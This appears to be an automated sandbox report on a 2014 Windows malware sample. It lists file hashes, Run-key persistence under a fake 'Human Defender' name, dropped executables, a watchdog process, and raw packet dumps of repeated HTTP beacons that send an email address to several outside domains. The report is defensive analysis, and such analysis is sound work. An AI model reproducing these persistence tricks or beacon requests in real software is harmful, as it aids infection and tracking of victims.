Analysis Date2014-09-19 03:45:45

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 532912182e497a0612e9cd2a57364714 sha1: 6870138e28dffa57b7e178d475dc5e9892dd9b47 size: 295936
Section .rdata md5: 15f2c5f4bf43cc26330b9d5f7a148af2 sha1: 7ffcc1ccce24472d6e6d735f2d7f5411f5ab5d95 size: 35328 md5: 8f6812085c00d5a11708bd6f4fd6d2c8 sha1: 38827995fa31e3b866d673ad5fe25910723649cb size: 108544
Timestamp: 2014-07-24 05:34:23
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Human Defender Engine Resource Publication Proxy ➝ C:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe
Creates File C:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe
Creates Process C:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe

↳ C:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe

Creates File C:\Documents and Settings\Administrator\Application Data\gksihqj\
Creates File \Device\Afd\Endpoint
Creates File C:\Documents and Settings\Administrator\Application Data\gksihqj\qpojtlphefu.exe
Creates Process WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe"

Network Details:
DNS queries: 85 × Type: A (the queried names are not present on the page)
Flows TCP 192.168.1.1:1031 ➝
Flows TCP 192.168.1.1:1032 ➝
Flows TCP 192.168.1.1:1033 ➝
Flows TCP 192.168.1.1:1034 ➝
Flows TCP 192.168.1.1:1035 ➝
Flows TCP 192.168.1.1:1036 ➝
Flows TCP 192.168.1.1:1037 ➝
Flows TCP 192.168.1.1:1038 ➝
Flows TCP 192.168.1.1:1039 ➝
Flows TCP 192.168.1.1:1040 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468   e@attbi.com&meth
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 71756965 74737061   ..Host: quietspa
0x00000070 (00112)   63652e6e 65740d0a 0d0a                ce.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468   e@attbi.com&meth
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 7468696e 6b626579   ..Host: thinkbey
0x00000070 (00112)   6f6e642e 6e65740d 0a0d0a              ond.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468   e@attbi.com&meth
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 70726573 656e7462   ..Host: presentb
0x00000070 (00112)   65696e67 2e6e6574 0d0a0d0a            eing.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468   e@attbi.com&meth
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 63686965 66626569   ..Host: chiefbei
0x00000070 (00112)   6e672e6e 65740d0a 0d0a0d0a            ng.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468   e@attbi.com&meth
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 7477656c 7665666f   ..Host: twelvefo
0x00000070 (00112)   72657665 722e6e65 740d0a0d 0a         rever.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468   e@attbi.com&meth
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 68697374 6f727966   ..Host: historyf
0x00000070 (00112)   6f726576 65722e6e 65740d0a 0d0a       orever.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468   e@attbi.com&meth
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 77656174 68657266   ..Host: weatherf
0x00000070 (00112)   6f726576 65722e6e 65740d0a 0d0a       orever.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468   e@attbi.com&meth
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 636c6173 73626579   ..Host: classbey
0x00000070 (00112)   6f6e642e 6e65740d 0a0d0a0a 0d0a       ond.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468   e@attbi.com&meth
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 7468696e 6b666c6f   ..Host: thinkflo
0x00000070 (00112)   7765722e 6e65740d 0a0d0a0a 0d0a       wer.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468   e@attbi.com&meth
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 70726573 656e7466   ..Host: presentf
0x00000070 (00112)   6c6f7765 722e6e65 740d0a0d 0a0a       lower.net.....

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
BX}>B +
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
